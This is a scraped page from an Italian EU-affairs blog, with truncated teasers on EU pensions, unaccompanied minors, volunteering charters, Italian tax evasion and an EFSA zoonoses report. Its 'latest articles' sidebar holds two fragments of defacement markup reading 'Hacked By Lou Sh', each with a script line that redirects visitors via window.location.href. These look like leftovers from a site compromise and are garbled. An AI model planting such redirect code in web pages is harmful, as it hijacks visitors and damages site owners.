EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Temi Sociali

Temi Sociali


Temi Sociali

it

La Commissione per il lavoro e gli affari sociali (Empl) del Parlamento Europeo che si occupa dei due settori del lavoro e degli affari sociali sta elaborando un progetto (che però non sarà di natura legislativa) che si focalizza sul problema delle pensioni. Questo prospetto sarà votato nel prossimo mese di maggio dall’aula di Strasburgo. Il messaggio forte che si vuole marcare in questa circostanza è quello di far sì che anche per i pensionati ci sia la possibilità di vivere una vita accettabile e adeguata senza dover ogni volta arrivare a stento alla fine del mese.

Ciò che si prefigge la Commissione Empl è di raggiungere l’obiettivo nel più breve tempo possibile. Quando il testo è stato presentato da Ria Oomen-Ruijten, membro del Partito popolare europeo, ha ottenuto 32 voti favorevoli, 6 astensioni e 4 voti contrari. Il rapporto messo a rischio è quello tra (...)

it

Maggiore impegno a livello nazionale ed europeo. Questa è la richiesta della Commissione, contenuta nella relazione presentata alla fine di settembre. Il miglioramento delle procedure di accoglienza di questi soggetti è auspicato anche dalla commissaria per gli Affari interni Cecilia Malmström.

Chi sono i minori non accompagnati

Con questo termine vengono identificati i minori provenienti da paesi terzi o gli apolidi, che non raggiungono il diciottesimo anno d’età e che si inoltrano nel territorio europeo senza una persona adulta responsabile che li accompagni, o che qui vengono (...)

it

"On The Move" giunge alla sua sesta edizione. Il creative contest, promosso dalla Fondazione Pubblicità Progresso, anche in questo 2012 fa appello alla fantasia dei giovani. Ai partecipanti è richiesto di immaginare di essere catapultati nel futuro e precisamente nel 2021, anno in cui la Fondazione festeggerà il suo cinquantesimo compleanno. Una volta compiuto il salto temporale, gli iscritti al concorso dovranno rimettere in moto la creatività e fingersi dei giornalisti o dei pubblicitari, alle prese con la produzione di materiale divulgativo proprio per conto di Pubblicità Progresso.

Quali sono gli obiettivi del contest?

La Fondazione Pubblicità Progresso intende innanzitutto ascoltare i suggerimenti e le proposte dei giovani, inoltre ha lo scopo di diffondere la comunicazione sociale e rendere noto il nome della Fondazione presso questa fascia d’età.

Chi può partecipare?

Se (...)

it

L’European Youth Forum (YFJ) è un’organizzazione internazionale che riunisce i Consigli della gioventù nazionali e le organizzazioni internazionali della gioventù provenienti da tutta Europa e si occupa della promozione degli interessi dei giovani. Il Forum e l’Alleanza dell’Anno Europeo del volontariato 2011 (EYV), assieme ad altri partner e stakeholder, hanno permesso la realizzazione di un documento molto importante, la Carta Europea dei Diritti e delle Responsabilità del Volontario. La Carta, articolata in diverse sezioni, definisce il significato dell’essere volontario, fornitore di volontariato e dell’attività di volontariato stessa.

Lo status di volontario richiede un suo riconoscimento giuridico; la Carta definisce i diritti del volontario e tutte le norme ambientali e legali che devono essere rispettate nelle attività di volontariato, nonché esprime con chiarezza i doveri e i diritti dei “volounteering providers”, i (...)

it

Don Biagio Conte è un personaggio molto noto, soprattutto nel Sud Italia, tanto da essere definito da alcuni "il novello San Francesco". Tale nomina esplica più di ogni altra parola l'importanza che quest'uomo ha rispetto ai disagiati, ai rassegnati e a chiunque abbia bisogno di aiuto quando le cose sembrano aver preso la via del non ritorno. L'Europa ha dimostrato un certo interesse verso questa figura che tanto bene sta facendo aiutando i più sfortunati a scapito della sua stessa esistenza, che lo vede impegnato in attività di sostegno verso gli altri da molti anni.

"Il conferimento a Biagio Conte del premio come Cittadino europeo 2012 da parte del Parlamento Europeo, è il riconoscimento ad una intera vita dedicata agli altri, alla promozione della cultura della solidarietà, all’interculturalità. Al Fratello Biagio i migliori auguri perché possa proseguire il (...)

it

Conoscere persone provenienti da molti Paesi e diversi contesti, vivere un'esperienza di volontariato internazionale, avvicinarsi a culture e popoli lontani. Queste sono solo alcune delle opportunità offerte dai campi di volontariato. Il motto è "deeds not words", fatti non parole.

La crisi economica colpisce duramente anche il mondo del volontariato, rendendo a volte proibitive o snaturando le esperienze low cost organizzate dallo SCI (Servizio Civile Internazionale). La deriva da evitare è che il terzo settore smetta di fungere da strumento, trasformandosi in un fine; (...)

it

L'Associazione Italiana Alberghi per la Gioventù è un ente istituzionale riconosciuto dall'Onu e membro della Federazione Internazionale degli Ostelli per la Gioventù. Alla base del progetto la necessità di avvicinare i giovani alla cultura.

Nonostante la globalizzazione sia ormai un dato di fatto e le frontiere rappresentino un limite fisico e concettuale ormai sorpassato e dimenticato, si tende ancora a sottovalutare l’importanza ricoperta dalla conoscenza acquisita mediante l’osservazione ’de visu’. Anzi, proprio la diffusione (...)

it

I dati sono in prospettiva futura e mostrano quella che sarà la situazione delle pensioni europee nel 2020. L'UE vuole risolvere sin da subito la questione per evitare degli strascichi che potrebbero protrarsi negli anni ed arrivare ad una situazione di non ritorno.

L’Unione Europea ha voluto spiegare con molta accuratezza quelli che sono i motivi che porteranno alla futura approvazione della riforma sulle pensioni. L’UE ha in primo luogo fatto notare che oggi la retribuzione post-lavorativa è la maggiore fonte di reddito per un quarto della popolazione, (...)

it

L’indagine commissionata dal gruppo parlamentare Alleanza Progressista dei Socialisti e dei Democratici (S&D) a Bruxelles, ha rivelato 180,257 miliardi di euro di evasione del fisco italiano nel 2009 pari quasi ad un terzo delle entrate totali. Preoccupante anche il valore dell’economia sommersa pari a 418,23 miliardi di euro. Dietro all’Italia si sono piazzate Germania e Francia.

Come se non bastassero i vari declassamenti delle varie agenzie di rating è arrivata da pochi giorni un’altra brutta notizia per l’Italia. L’indagine, basata su dati del 2009, ha rivelato il livello di emergenza economica del Bel Paese. A metterla in luce ci ha pensato un gruppo parlamentare, (...)

it

L’Autorità Europea per la sicurezza alimentare, in collaborazione con il Centro Europeo per la prevenzione e il controllo delle malattie (ECDC), ha pubblicato il proprio rapporto annuale, relativo all’anno 2010, riguardante le zoonosi e la trasmissione alimentare delle malattie. Dal documento emergono dati significativi. I casi di Salmonella nell’uomo sono diminuiti del circa 10% e in netta diminuzione sono anche i casi di Salmonella nel pollame. Il dato negativo ci giunge invece dal continuo aumento dei casi di contrazione della campilobatteriosi.

Cos’è l’EFSA e di cosa si occupa?

La European Food Safety Authority (EFSA), l’Autorità Europea per la Sicurezza Alimentare, è un organo specializzato dell’Unione Europea con lo scopo di fornire consulenze specifiche agli Stati membri e alle istituzioni dell’UE. Questa agenzia, istituita nel 2002, (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France